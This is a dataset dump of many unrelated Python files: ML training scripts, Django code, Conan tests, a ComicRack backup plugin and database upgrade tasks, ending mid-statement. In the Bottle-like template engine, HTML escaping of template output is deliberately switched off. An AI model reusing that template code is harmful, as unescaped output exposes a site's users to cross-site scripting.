text stringlengths 8 6.05M |
|---|
'''
Faire des tests sur les dimensions des fonctions, rapide juste un assert pour être sur
'''
import matplotlib.pyplot as plt
import numpy as np
import sklearn.metrics as skt
from src.Activation.sigmoid import Sigmoid
from src.Activation.softmax import Softmax
from src.Loss.CESoftMax import CESoftMax
from src.Module.linear import Linear
from src.Module.sequential import Sequential
from src.Optim.optim import Optim
from src.utils.utils import load_usps, transform_numbers
def test_multiclass():
"""
testx, testy = get_usps([neg, pos], alltestx, alltesty)
testy = np.where(testy == neg, -1, 1)
:return:
"""
uspsdatatrain = "data/USPS_train.txt"
uspsdatatest = "data/USPS_test.txt"
alltrainx, alltrainy = load_usps(uspsdatatrain)
alltestx, alltesty = load_usps(uspsdatatest)
validation_size = 500
allvalx = alltestx[:validation_size]
allvaly = alltesty[:validation_size]
alltestx = alltestx[validation_size:]
alltesty = alltesty[validation_size:]
input_size = len(alltrainx[0])
output_size = len(np.unique(alltesty))
alltrainy_proba = transform_numbers(alltrainy, output_size)
# Initialize modules with respective size
iteration = 1000
gradient_step = 1e-3
arbitrary_neural = 128
batch_size = 25 # len(alltrainx)
m_linear = Linear(input_size, arbitrary_neural)
m_act1 = Sigmoid()
m_linear2 = Linear(arbitrary_neural, output_size)
m_act2 = Softmax()
m_loss = CESoftMax()
seq = Sequential([m_linear, m_act1, m_linear2])
opt = Optim(seq, loss=m_loss, eps=gradient_step)
opt.SGD(alltrainx, alltrainy_proba, batch_size, X_val=allvalx, Y_val=allvaly, f_val=lambda x: np.argmax(x, axis=1),
maxiter=iteration, verbose=2)
predict = m_act2.forward(opt.predict(alltestx))
predict = np.argmax(predict, axis=1)
res = skt.confusion_matrix(predict, alltesty)
print(np.sum(np.where(predict == alltesty, 1, 0)) / len(predict))
plt.imshow(res)
if __name__ == '__main__':
test_multiclass()
|
from discord.ext import commands
class SubcommandIsNone(commands.CommandError):
"""
Исключение, когда пользователь не указал подкоманду из группы команд
"""
def __init__(self, commands_group):
self.commands_group = commands_group
class CogImportError(commands.CommandError):
"""
Исключение, когда ошибка при загрузке/отгрущзке/перезагрузке кога
"""
def __init__(self, error_text):
self.error_text = error_text
|
# Generated by Django 2.2.4 on 2020-03-22 11:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("budget", "0009_quartertotal")]
operations = [
migrations.RemoveField(model_name="quartertotal", name="amount_pln"),
migrations.AlterField(
model_name="quartertotal",
name="amount_gbp",
field=models.DecimalField(decimal_places=2, default=0, max_digits=8),
),
migrations.AlterField(
model_name="quartertotal",
name="amount_safe",
field=models.DecimalField(decimal_places=2, default=0, max_digits=8),
),
migrations.AlterField(
model_name="quartertotal",
name="amount_usd",
field=models.DecimalField(decimal_places=2, default=0, max_digits=8),
),
]
|
import subprocess
import os
import tempfile
def importer(filename, type):
contents = ''
with tempfile.TemporaryDirectory() as tmpdir:
if type == 'png':
path = tmpdir + '/out'
redirected_output_file = open(os.devnull, "w")
subprocess.call(['tesseract', filename, path], stderr=redirected_output_file)
redirected_output_file.close()
elif type == 'jpg':
path = tmpdir + '/out'
redirected_output_file = open(os.devnull, "w")
subprocess.call(['tesseract', filename, path], stderr=redirected_output_file)
redirected_output_file.close()
output_file = open(path+'.txt', 'r')
contents = output_file.read()
output_file.close()
return contents;
# test run:
# UwU = importer('../test_files/test.png', 'png')
# print(UwU)
|
import unittest
from conans.test.utils.tools import TestClient
from conans.paths import CONANINFO
from conans.util.files import load
import os
class OptionTest(unittest.TestCase):
def parsing_test(self):
client = TestClient()
conanfile = '''
from conans import ConanFile
class EqualerrorConan(ConanFile):
name = "equal"
version = "1.0.0"
options = {"opt": "ANY"}
def build(self):
self.output.warn("OPTION %s" % self.options.opt)
'''
client.save({"conanfile.py": conanfile})
client.run("export user/testing")
conanfile = '''
[requires]
equal/1.0.0@user/testing
[options]
equal:opt=a=b
'''
client.save({"conanfile.txt": conanfile}, clean_first=True)
client.run("install . --build=missing")
self.assertIn("OPTION a=b", client.user_io.out)
def basic_test(self):
client = TestClient()
zlib = '''
from conans import ConanFile
class ConanLib(ConanFile):
name = "zlib"
version = "0.1"
options = {"shared": [True, False]}
default_options= "shared=False"
'''
client.save({"conanfile.py": zlib})
client.run("export lasote/testing")
project = """[requires]
zlib/0.1@lasote/testing
"""
client.save({"conanfile.txt": project}, clean_first=True)
client.run("install -o zlib:shared=True --build=missing")
self.assertIn("zlib/0.1@lasote/testing:2a623e3082a38f90cd2c3d12081161412de331b0",
client.user_io.out)
conaninfo = load(os.path.join(client.current_folder, CONANINFO))
self.assertIn("zlib:shared=True", conaninfo)
# Options not cached anymore
client.run("install --build=missing")
self.assertIn("zlib/0.1@lasote/testing:5ab84d6acfe1f23c4fae0ab88f26e3a396351ac9",
client.user_io.out)
conaninfo = load(os.path.join(client.current_folder, CONANINFO))
self.assertNotIn("zlib:shared=True", conaninfo)
|
'''
Created on 2013-4-21
@author: Xsank
'''
import os
import re
import tokenize
from exception import TemplateError
from util import tou,abort,html_escape
from config import TEMPLATES,TEMPLATE_PATH,DEBUG
class BaseTemplate(object):
extentions = ['tpl','html']
settings = {}
defaults = {}
def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **settings):
self.name = name
self.source = source.read() if hasattr(source, 'read') else source
self.filename = source.filename if hasattr(source, 'filename') else None
self.lookup = map(os.path.abspath, lookup)
self.encoding = encoding
self.settings = self.settings.copy()
self.settings.update(settings)
if not self.source and self.name:
self.filename = self.search(self.name, self.lookup)
if not self.filename:
raise TemplateError('Template %s not found.' % repr(name))
if not self.source and not self.filename:
raise TemplateError('No template specified.')
self.prepare(**self.settings)
@classmethod
def search(cls, name, lookup=[]):
if os.path.isfile(name): return name
for spath in lookup:
fname = os.path.join(spath, name)
if os.path.isfile(fname):
return fname
for ext in cls.extentions:
if os.path.isfile('%s.%s' % (fname, ext)):
return '%s.%s' % (fname, ext)
@classmethod
def global_config(cls, key, *args):
if args:
cls.settings[key] = args[0]
else:
return cls.settings[key]
def prepare(self, **options):
raise NotImplementedError
def render(self, **args):
raise NotImplementedError
class SimpleTemplate(BaseTemplate):
blocks = ('if','elif','else','try','except','finally','for','while','with','def','class')
dedent_blocks = ('elif', 'else', 'except', 'finally')
def prepare(self, escape_func=html_escape, noescape=False):
self.cache = {}
if self.source:
self.code = self.translate(self.source)
self.co = compile(self.code, '<string>', 'exec')
else:
self.code = self.translate(open(self.filename).read())
self.co = compile(self.code, self.filename, 'exec')
enc = self.encoding
self._str = lambda x: tou(x, enc)
#use html escape ,but something infect did wrong
#self._escape = lambda x: escape_func(tou(x, enc))
self._escape=lambda x:tou(x,enc)
if noescape:
self._str, self._escape = self._escape, self._str
def translate(self, template):
stack = []
lineno = 0
ptrbuffer = []
codebuffer = []
oneline=multiline = dedent = False
def yield_tokens(line):
for i, part in enumerate(re.split(r'\{\{(.*?)\}\}', line)):
if i % 2:
if part.startswith('!'): yield 'RAW', part[1:]
else: yield 'CMD', part
else: yield 'TXT', part
def split_comment(codeline):
line = codeline.splitlines()[0]
try:
tokens = list(tokenize.generate_tokens(iter(line).next))
except tokenize.TokenError:
return line.rsplit('#',1) if '#' in line else (line, '')
for token in tokens:
if token[0] == tokenize.COMMENT:
start, end = token[2][1], token[3][1]
return codeline[:start] + codeline[end:], codeline[start:end]
return line, ''
def flush():
if not ptrbuffer: return
cline = ''
for line in ptrbuffer:
for token, value in line:
if token == 'TXT': cline += repr(value)
elif token == 'RAW': cline += '_str(%s)' % value
elif token == 'CMD': cline += '_escape(%s)' % value
cline += ', '
cline = cline[:-2] + '\\\n'
cline = cline[:-2]
if cline[:-1].endswith('\\\\\\\\\\n'):
cline = cline[:-7] + cline[-1]
cline = '_printlist([' + cline + '])'
del ptrbuffer[:]
code(cline)
def code(stmt):
for line in stmt.splitlines():
codebuffer.append(' ' * len(stack) + line.strip())
for line in template.splitlines(True):
lineno += 1
line = line if isinstance(line, unicode)\
else unicode(line, encoding=self.encoding)
if lineno <= 2:
m = re.search(r"%.*coding[:=]\s*([-\w\.]+)", line)
if m: self.encoding = m.group(1)
if m: line = line.replace('coding','coding (removed)')
if line.strip()[:2].count('%') == 1:
line = line.split('%',1)[1].lstrip()
cline = split_comment(line)[0].strip()
cmd = re.split(r'[^a-zA-Z0-9_]', cline)[0]
flush()
if cmd in self.blocks or multiline:
cmd = multiline or cmd
dedent = cmd in self.dedent_blocks
if dedent and not oneline and not multiline:
cmd = stack.pop()
code(line)
oneline = not cline.endswith(':')
multiline = cmd if cline.endswith('\\') else False
if not oneline and not multiline:
stack.append(cmd)
elif cmd == 'end' and stack:
code('#end(%s) %s' % (stack.pop(), line.strip()[3:]))
elif cmd == 'include':
p = cline.split(None, 2)[1:]
if len(p) == 2:
code("_=_include(%s, _stdout, %s)" % (repr(p[0]), p[1]))
elif p:
code("_=_include(%s, _stdout)" % repr(p[0]))
else:
code("_printlist(_base)")
elif cmd == 'rebase':
p = cline.split(None, 2)[1:]
if len(p) == 2:
code("globals()['_rebase']=(%s, dict(%s))" % (repr(p[0]), p[1]))
elif p:
code("globals()['_rebase']=(%s, {})" % repr(p[0]))
else:
code(line)
else:
if line.strip().startswith('%%'):
line = line.replace('%%', '%', 1)
ptrbuffer.append(yield_tokens(line))
flush()
return '\n'.join(codebuffer) + '\n'
def subtemplate(self, _name, _stdout, **args):
if _name not in self.cache:
self.cache[_name] = self.__class__(name=_name, lookup=self.lookup)
return self.cache[_name].execute(_stdout, **args)
def execute(self, _stdout, **args):
#_stdout change the html code
env = self.defaults.copy()
env.update({'_stdout': _stdout, '_printlist': _stdout.extend,
'_include': self.subtemplate, '_str': self._str,
'_escape': self._escape})
env.update(args)
eval(self.co, env)
if '_rebase' in env:
subtpl, rargs = env['_rebase']
subtpl = self.__class__(name=subtpl, lookup=self.lookup)
rargs['_base'] = _stdout[:]
del _stdout[:]
return subtpl.execute(_stdout, **rargs)
return env
def render(self, **args):
stdout = []
try:
#execute error
self.execute(stdout, **args)
except Exception,e:
print e
finally:
return ''.join(stdout)
def template(tpl, template_adapter=SimpleTemplate, **kwargs):
if tpl not in TEMPLATES or DEBUG:
settings = kwargs.get('template_settings',{})
lookup = kwargs.get('template_lookup', TEMPLATE_PATH)
if isinstance(tpl, template_adapter):
TEMPLATES[tpl] = tpl
if settings: TEMPLATES[tpl].prepare(**settings)
elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl:
TEMPLATES[tpl] = template_adapter(source=tpl, lookup=lookup, **settings)
else:
TEMPLATES[tpl] = template_adapter(name=tpl, lookup=lookup, **settings)
if not TEMPLATES[tpl]:
abort(500, 'Template (%s) not found' % tpl)
return TEMPLATES[tpl].render(**kwargs)
|
#import sys
#input = sys.stdin.readline
def main():
N = int(input())
S = list(input())
ANS = []
t = 0
for s in S:
# print(t, ANS)
if t <= 1:
ANS.append(s)
t += 1
continue
if s != "x":
ANS.append(s)
t += 1
continue
if ANS[-1] == "o" and ANS[-2] == "f":
t -= 2
ANS.pop()
ANS.pop()
else:
ANS.append(s)
t += 1
print(len(ANS))
if __name__ == '__main__':
main()
|
list1 = list( range (1,31))
print(list1)
print('------------------------------\n')
print('\n'.join([' '.join('%d*%d=%d' % (x,y,x*y) for x in range(1,y+1)) for y in range(1,10)]))
print('-------------------------------\n')
list2 = [x*x for x in range(1,11)]
print(list2)
print('-------------------------------\n')
list3 = [x*x for x in range(1,11) if x %2 ==0]
print(list3)
|
from django.http import request
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
#return HttpResponse("<em>My Second App</em>")
my_dict = {"insert_me" : "Hello, I am from views.py - I am the index page!",
"title" : "Index Page"}
return render(request, 'AppTwo/index.html', context=my_dict)
def help(request):
my_dict = {"help_me" : "Hello, I am also from views.py - but I am the help page!",
"title": "Help Page"}
return render(request, 'AppTwo/index.html', context=my_dict)
|
#!/usr/bin/env python
# encoding: utf-8
import unittest
import simulator.tests.mm1 as mm1
import simulator.tests.sim as sim
# Run tests
# 1. MM1EventHandler class
unittest.TextTestRunner(verbosity=2).run(
unittest.TestLoader().loadTestsFromTestCase(mm1.MM1EventHandlerTests))
# 2. SimulatorEngine class
unittest.TextTestRunner(verbosity=2).run(
unittest.TestLoader().loadTestsFromTestCase(sim.SimulationEngineTests))
# 3. Event class
unittest.TextTestRunner(verbosity=2).run(
unittest.TestLoader().loadTestsFromTestCase(sim.EventTests))
|
#!/usr/bin/env python
iwconf_file = open('iwcfg.txt', 'r+')
iwconf = iwconf_file.readlines()
iwconf_file.close()
link_quality = ""
signal = ""
for line in iwconf:
if line.find("Link Quality") > -1:
link_quality = line[23:25]
signal = line[43:46]
link_quality = str(float(link_quality)/70)
print "Link Quality: " + link_quality
print "Signal: " + signal
wlan0_output = open('wlan0_output.txt', 'a+')
wlan0_output.write(signal+","+link_quality+"\n")
|
'''
Backup Manager for ComicRack
bmUtils.py - utility classes for the Backup Manager
Copyright 2013 docdoom
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ionic zip library used with permission from http://dotnetzip.codeplex.com
Icons and images used with permission from http://jonasraskdesign.com
'''
import clr
import System.Windows.Forms
from System.Windows.Forms import *
import datetime
import System.IO
from System.IO import Path, FileInfo, File, Directory
clr.AddReference('Ionic.Zip')
from Ionic.Zip import *
FOLDER = FileInfo(__file__).DirectoryName + '\\'
INIFILE = Path.Combine(FOLDER, 'backupMan.ini')
ICONLARGE = Path.Combine(FOLDER, 'backupManLarge.png')
FILENUMBERWARNING = 100 # threshold of backup file count
class backupManagerUtils:
def __init__(self):
pass
def setBackupFolder(self):
ini = iniFile()
dialog = FolderBrowserDialog()
dialog.Description = 'The Backup Manager for ComicRack\n\nPlease select where to store your backups'
root = ini.getValue(INIFILE,'backupFolder')
version = ini.getValue(INIFILE, 'Version')
if str.Trim(root) <> '':
dialog.SelectedPath = root
else:
dialog.RootFolder = System.Environment.SpecialFolder.Desktop
if dialog.ShowDialog() == DialogResult.OK:
ini.writeIni(INIFILE,'backupFolder',dialog.SelectedPath)
return True
else:
return False
def do_the_backup(self, FULLBACKUP = False, SHOWRESULT = False):
ini = iniFile()
version = ini.getValue(INIFILE, 'Version')
msgBoxTitle = 'Backup Manager for ComicRack %s' % version
backupFolder = ''
if not File.Exists(INIFILE):
self.setBackupFolder()
else:
backupFolder = ini.getValue(INIFILE,'backupFolder')
if str.Trim(backupFolder) == '':
return self.setBackupFolder()
elif not Directory.Exists(backupFolder):
MessageBox.Show('The path for your backup is not valid. Please configure!', msgBoxTitle)
return self.setBackupFolder()
else:
if Directory.GetFiles(backupFolder,'ComicDB*.zip').Length > FILENUMBERWARNING:
MessageBox.Show('There are a lot of backup files in your backupfolder.\nYou should consider a clean-up', msgBoxTitle)
now = datetime.datetime.now()
myAppDataFolder = System.Environment.ExpandEnvironmentVariables('%appdata%') + '\\'
myAppDataFolder = Path.Combine(myAppDataFolder,'cyo\\ComicRack') + '\\'
myThumbnailFolder = System.Environment.ExpandEnvironmentVariables('%LOCALAPPDATA%') + r'\cyo\ComicRack\cache\CustomThumbnails'
myDBFile = Path.Combine(myAppDataFolder,'ComicDB.xml')
myConfigXML = Path.Combine(myAppDataFolder,'config.xml')
myDate = now
currentDate = myDate.strftime("%Y-%m-%d_%H%M%S")
zipfile = ZipFile()
if not File.Exists(myDBFile):
MessageBox.Show('I could not find your library file. Please post this error.', msgBoxTitle)
else:
if not Directory.Exists(backupFolder):
Directory.CreateDirectory(backupFolder)
if FULLBACKUP == True:
myBackup = backupFolder + '\\ComicDB Full Backup %s.zip' % currentDate
zipfile.AddDirectory(myAppDataFolder, myAppDataFolder)
zipfile.AddDirectory(myThumbnailFolder, myThumbnailFolder)
else:
myBackup = backupFolder + '\\ComicDB Backup %s.zip' % currentDate
zipfile.AddFile(myDBFile,'')
zipfile.AddDirectory(myThumbnailFolder, 'Thumbnails')
zipfile.Save(myBackup)
if SHOWRESULT == True:
if File.Exists(myBackup) and SHOWRESULT == True:
MessageBox.Show('Backup saved as \n%s' % myBackup, msgBoxTitle)
ini.writeIni(INIFILE,'LastBackupTime', myDate.strftime("%Y-%m-%d %H:%M:%S"))
else:
MessageBox.Show('No backup file was saved. Something unexpected must have happened ...', msgBoxTitle)
return True
class iniFile:
def __init__(self):
pass
def writeIni(self, theFile, myKey, myVal):
'''
writes the key myKey and value myVal to the ini-file
'''
if File.Exists(theFile):
linefound = False
newConfig = []
myLines = File.ReadAllLines(theFile)
for line in myLines:
s = str.split(line,'=')
if str.lower(str.Trim(s[0])) == str.lower(myKey):
line = '%s = %s' % (myKey, myVal)
linefound = True
newConfig.append(line)
if linefound == False:
newConfig.append('%s = %s' % (myKey, myVal))
File.WriteAllLines(theFile,newConfig)
else:
File.AppendAllText(theFile,'%s = %s%s' % (myKey, myVal, System.Environment.NewLine))
return
def getValue(self, theFile, myKey):
'''
retrieves the value of myKey in Ini-file theFile
'''
if File.Exists(theFile):
myLines = File.ReadAllLines(theFile)
for line in myLines:
s = str.split(line,'=')
if str.Trim(s[0]) == myKey:
return str.Trim(s[1])
return ''
|
import tensorflow as tf
import numpy as np
import os
from tensorflow import keras
from tensorflow.keras import layers
from PIL import Image
from matplotlib import pyplot as plt
tf.random.set_seed(22)
np.random.seed(22)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def save_image(imgs, name):
new_im = Image.new('L', (280, 280))
index = 0
for i in range(0, 280, 28):
for j in range(0, 280, 28):
im = imgs[index]
im = Image.fromarray(im, mode='L')
new_im.paste(im, (i, j))
index += 1
new_im.save(name)
h_dim = 20
batch_size = 512
learning_rate = 1e-3
(x_train, y_train), (x_test, y_test) = keras.datasets.fashion_mnist.load_data()
x_train, x_test = x_train.astype(np.float32) / 255., x_test.astype(np.float32) / 255.
train_db = tf.data.Dataset.from_tensor_slices(x_train)
train_db = train_db.shuffle(batch_size * 5).batch(batch_size)
test_db = tf.data.Dataset.from_tensor_slices(x_test)
test_db = test_db.batch(batch_size)
print(x_train.shape, x_test.shape)
class AE(keras.Model):
def __init__(self):
super(AE, self).__init__()
# encoder
self.encoder = keras.Sequential(
[
layers.Dense(256, activation=tf.nn.relu),
layers.Dense(128, activation=tf.nn.relu),
layers.Dense(h_dim, ),
]
)
# decoder
self.decoder = keras.Sequential([
layers.Dense(128, activation=tf.nn.relu),
layers.Dense(256, activation=tf.nn.relu),
layers.Dense(784),
])
def call(self, inputs, training=None):
# b, 784--> b, 10
x = self.encoder(inputs)
# b, 10 --> b, 784
x_hat = self.decoder(x)
return x_hat
model = AE()
model.build(input_shape=(None, 784))
model.summary()
optim = keras.optimizers.Adam(learning_rate)
for epoch in range(100):
for step, x in enumerate(train_db):
# b, 28, 28
x = tf.reshape(x, [-1, 784])
with tf.GradientTape() as tape:
x_rec_logits = model(x)
rec_loss = tf.losses.binary_crossentropy(x, x_rec_logits, from_logits=True)
rec_loss = tf.reduce_mean(rec_loss)
grads = tape.gradient(rec_loss, model.trainable_variables)
optim.apply_gradients(zip(grads, model.trainable_variables))
if step % 100 == 0:
print(epoch, step, float(rec_loss))
x = next(iter(test_db))
# x = tf.reshape(x, [-1, 784])
logits = model(tf.reshape(x, [-1, 784]))
x_hat = tf.nn.sigmoid(logits)
x_hat = tf.reshape(x_hat, [-1, 28, 28])
x_concat = tf.concat([x, x_hat], axis=0)
x_concat = x_concat.numpy() * 255.
x_concat = x_concat.astype(np.uint8)
save_image(x_concat, 'ae_images/rec_epoch_%d.png') |
""" Contains upgrade tasks that are executed when the application is being
upgraded on the server. See :class:`onegov.core.upgrade.upgrade_task`.
"""
from onegov.core.orm.types import HSTORE
from onegov.core.orm.types import JSON
from onegov.core.orm.types import UTCDateTime
from onegov.core.upgrade import upgrade_task
from sqlalchemy import Boolean
from sqlalchemy import Column
from sqlalchemy import Enum
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import Numeric
from sqlalchemy import Text
from sqlalchemy.engine.reflection import Inspector
def alter_domain_of_influence(context, old, new):
# see http://stackoverflow.com/a/14845740
# Todo: Check if old exists
old_type = Enum(*old, name='domain_of_influence')
# Change current types to a temporary one
tmp_type = Enum(*new, name='_domain_of_influence')
tmp_type.create(context.operations.get_bind(), checkfirst=False)
inspector = Inspector(context.operations_connection)
tables = ['elections', 'election_compounds', 'votes', 'archived_results']
for table in tables:
if table in inspector.get_table_names(context.schema):
context.operations.execute(
f'ALTER TABLE {table} '
f'ALTER COLUMN domain TYPE _domain_of_influence '
f'USING domain::text::_domain_of_influence'
)
# Drop old one
old_type.drop(context.operations.get_bind(), checkfirst=False)
# Change temporary to new one with the right name
new_type = Enum(*new, name='domain_of_influence')
new_type.create(context.operations.get_bind(), checkfirst=False)
for table in tables:
context.operations.execute(
f'ALTER TABLE {table} '
f'ALTER COLUMN domain TYPE domain_of_influence '
f'USING domain::text::domain_of_influence'
)
# Drop temporary
tmp_type.drop(context.operations.get_bind(), checkfirst=False)
@upgrade_task('Rename yays to yeas')
def rename_yays_to_yeas(context):
if not context.has_column('ballot_results', 'yeas'):
context.operations.alter_column(
'ballot_results', 'yays', new_column_name='yeas'
)
@upgrade_task('Add shortcode column')
def add_shortcode_column(context):
if not context.has_column('votes', 'shortcode'):
context.operations.add_column('votes', Column('shortcode', Text()))
@upgrade_task('Enable translation of vote title')
def enable_translation_of_vote_title(context):
if context.has_column('votes', 'title'):
context.operations.drop_column('votes', 'title')
if not context.has_column('votes', 'title_translations'):
context.operations.add_column('votes', Column(
'title_translations', HSTORE, nullable=False
))
@upgrade_task('Add absolute majority column')
def add_absolute_majority_column(context):
if not context.has_column('elections', 'absolute_majority'):
context.operations.add_column(
'elections',
Column('absolute_majority', Integer())
)
@upgrade_task('Add meta data')
def add_meta_data_columns(context):
if not context.has_column('elections', 'meta'):
context.operations.add_column('elections', Column('meta', JSON()))
if not context.has_column('votes', 'meta'):
context.operations.add_column('votes', Column('meta', JSON()))
@upgrade_task('Add municipality domain of influence')
def add_municipality_domain(context):
# Rename the columns
renames = (
('elections', 'total_municipalities', 'total_entities'),
('elections', 'counted_municipalities', 'counted_entities'),
('election_results', 'municipality_id', 'entity_id'),
('ballot_results', 'municipality_id', 'entity_id'),
)
for table, old, new in renames:
if context.has_column(table, old):
context.operations.alter_column(table, old, new_column_name=new)
# Add the new domain,
alter_domain_of_influence(
context,
['federation', 'canton'],
['federation', 'canton', 'municipality']
)
@upgrade_task('Add party resuts columns')
def add_party_results_columns(context):
if not context.has_column('party_results', 'color'):
context.operations.add_column(
'party_results',
Column('color', Text())
)
if not context.has_column('party_results', 'year'):
context.operations.add_column(
'party_results',
Column('year', Integer())
)
if not context.has_column('party_results', 'total_votes'):
context.operations.add_column(
'party_results',
Column('total_votes', Integer())
)
@upgrade_task('Add status')
def add_status_columns(context):
if not context.has_column('elections', 'status'):
context.operations.add_column(
'elections',
Column(
'status',
Enum(
'unknown',
'interim',
'final',
name='election_or_vote_status'
),
nullable=True
)
)
if not context.has_column('votes', 'status'):
context.operations.add_column(
'votes',
Column(
'status',
Enum(
'unknown',
'interim',
'final',
name='election_or_vote_status'
),
nullable=True
)
)
@upgrade_task('Add party to candidate')
def add_candidate_party_column(context):
for table in ['candidates', 'candiates']:
if context.has_table(table):
if not context.has_column(table, 'party'):
context.operations.add_column(
table,
Column('party', Text, nullable=True)
)
@upgrade_task('Rename candidates tables')
def rename_candidates_tables(context):
for old_name, new_name in (
('candiate_results', 'candidate_results'),
('candiates', 'candidates'),
):
if context.has_table(old_name):
if context.has_table(new_name):
context.operations.drop_table(new_name)
context.operations.rename_table(old_name, new_name)
@upgrade_task('Adds ballot title')
def add_ballot_title(context):
if not context.has_column('ballots', 'title_translations'):
context.operations.add_column('ballots', Column(
'title_translations', HSTORE, nullable=True
))
@upgrade_task('Add content columns')
def add_content_columns(context):
if not context.has_column('elections', 'content'):
context.operations.add_column('elections', Column('content', JSON))
if not context.has_column('votes', 'content'):
context.operations.add_column('votes', Column('content', JSON))
@upgrade_task('Add vote type column')
def add_vote_type_column(context):
if not context.has_column('votes', 'type'):
context.operations.add_column('votes', Column('type', Text))
@upgrade_task('Change election type column')
def change_election_type_column(context):
type_ = Enum('proporz', 'majorz', name='type_of_election')
context.operations.execute(
'ALTER TABLE elections ALTER COLUMN type TYPE Text'
)
type_.drop(context.operations.get_bind(), checkfirst=False)
@upgrade_task('Replaces results group with name and district')
def replace_results_group(context):
for table in ('ballot_results', 'election_results'):
if (
context.has_column(table, 'group')
and not context.has_column(table, 'name')
):
context.operations.alter_column(
table, 'group', new_column_name='name'
)
if not context.has_column(table, 'district'):
context.operations.add_column(
table, Column('district', Text, nullable=True)
)
@upgrade_task('Change counted columns of elections')
def change_counted_columns_of_elections(context):
if not context.has_column('election_results', 'counted'):
context.operations.add_column(
'election_results', Column(
'counted', Boolean, nullable=False, server_default='TRUE'
)
)
if context.has_column('elections', 'total_entities'):
context.operations.drop_column('elections', 'total_entities')
if context.has_column('elections', 'counted_entities'):
context.operations.drop_column('elections', 'counted_entities')
@upgrade_task(
'Add region domain of influence',
requires='onegov.ballot:Add municipality domain of influence',
)
def add_region_domain(context):
alter_domain_of_influence(
context,
['federation', 'canton', 'municipality'],
['federation', 'region', 'canton', 'municipality'],
)
@upgrade_task('Rename eligible voters columns')
def renmame_elegible_voters_columns(context):
tables = (
'elections', 'election_results', 'ballots', 'ballot_results', 'votes'
)
for table in tables:
if context.has_column(table, 'elegible_voters'):
context.operations.alter_column(
table, 'elegible_voters', new_column_name='eligible_voters'
)
@upgrade_task('Add party results to compounds')
def add_party_results_to_compounds(context):
if context.has_column('party_results', 'election_id'):
context.operations.drop_constraint(
'party_results_election_id_fkey',
'party_results',
type_='foreignkey'
)
context.operations.alter_column(
'party_results',
'election_id',
new_column_name='owner'
)
@upgrade_task('Add panachage results to compounds')
def add_panachage_results_to_compounds(context):
if not context.has_column('panachage_results', 'owner'):
context.operations.add_column(
'panachage_results',
Column('owner', Text())
)
if context.has_column('panachage_results', 'source_list_id'):
context.operations.alter_column(
'panachage_results',
'source_list_id',
new_column_name='source'
)
if context.has_column('panachage_results', 'target_list_id'):
context.operations.drop_constraint(
'panachage_results_target_list_id_fkey',
'panachage_results',
type_='foreignkey'
)
context.operations.execute(
'ALTER TABLE panachage_results '
'ALTER COLUMN target_list_id TYPE Text'
)
context.operations.alter_column(
'panachage_results',
'target_list_id',
new_column_name='target'
)
@upgrade_task(
'Add update contraints',
requires='onegov.ballot:Rename candidates tables',
)
def add_update_contraints(context):
# We use SQL (rather than operations.xxx) so that we can drop and add
# the constraints in one statement
for ref, table in (
('vote', 'ballots'),
# ('election', 'candidates'),
('election', 'election_results'),
('election', 'list_connections'),
('election', 'lists'),
):
context.operations.execute(
f'ALTER TABLE {table} '
f'DROP CONSTRAINT {table}_{ref}_id_fkey, '
f'ADD CONSTRAINT {table}_{ref}_id_fkey'
f' FOREIGN KEY ({ref}_id) REFERENCES {ref}s (id)'
f' ON UPDATE CASCADE'
)
# there was a typo
context.operations.execute(
'ALTER TABLE candidates '
'DROP CONSTRAINT IF EXISTS candiates_election_id_fkey, '
'DROP CONSTRAINT IF EXISTS candidates_election_id_fkey, '
'ADD CONSTRAINT candidates_election_id_fkey'
' FOREIGN KEY (election_id) REFERENCES elections (id)'
' ON UPDATE CASCADE'
)
@upgrade_task('Migrate election compounds')
def migrate_election_compounds(context):
if context.has_column('election_compounds', 'elections'):
context.operations.drop_column('election_compounds', 'elections')
@upgrade_task('Adds a default majority type')
def add_default_majority_type(context):
# Removed data migrations
pass
@upgrade_task('Add delete contraints')
def add_delete_contraints(context):
# We use SQL (rather than operations.xxx) so that we can drop and add
# the constraints in one statement
for table, ref, update, delete in (
# ('candidate_results', 'candidate', False, True), # see below
# ('candidate_results', 'election_result', False, True), # see below
('candidates', 'election', True, True),
# ('candidates', 'list', False, True), # see below
('election_results', 'election', True, True),
('list_connections', 'election', True, True),
('list_results', 'election_result', False, True),
('list_results', 'list', False, True),
# ('lists', 'connection', False, True), # see below
('lists', 'election', True, True),
('ballot_results', 'ballot', False, True),
):
update = 'ON UPDATE CASCADE' if update else ''
delete = 'ON DELETE CASCADE' if delete else ''
context.operations.execute(
f'ALTER TABLE {table} '
f'DROP CONSTRAINT {table}_{ref}_id_fkey, '
f'ADD CONSTRAINT {table}_{ref}_id_fkey'
f' FOREIGN KEY ({ref}_id) REFERENCES {ref}s (id) {update} {delete}'
)
# there was a typo
context.operations.execute(
'ALTER TABLE candidate_results '
'DROP CONSTRAINT IF EXISTS candiate_results_candiate_id_fkey, '
'DROP CONSTRAINT IF EXISTS candiate_results_candidate_id_fkey, '
'DROP CONSTRAINT IF EXISTS candidate_results_candiate_id_fkey, '
'DROP CONSTRAINT IF EXISTS candidate_results_candidate_id_fkey, '
'ADD CONSTRAINT candidate_results_candidate_id_fkey'
' FOREIGN KEY (candidate_id) REFERENCES candidates (id)'
' ON DELETE CASCADE'
)
context.operations.execute(
'ALTER TABLE candidate_results '
'DROP CONSTRAINT IF EXISTS candiate_results_election_result_id_fkey, '
'DROP CONSTRAINT IF EXISTS candidate_results_election_result_id_fkey,'
' ADD CONSTRAINT candidate_results_election_result_id_fkey'
' FOREIGN KEY (election_result_id) REFERENCES election_results (id)'
' ON DELETE CASCADE'
)
context.operations.execute(
'ALTER TABLE candidates '
'DROP CONSTRAINT IF EXISTS candiates_list_id_fkey, '
'DROP CONSTRAINT IF EXISTS candidates_list_id_fkey,'
' ADD CONSTRAINT candidates_list_id_fkey'
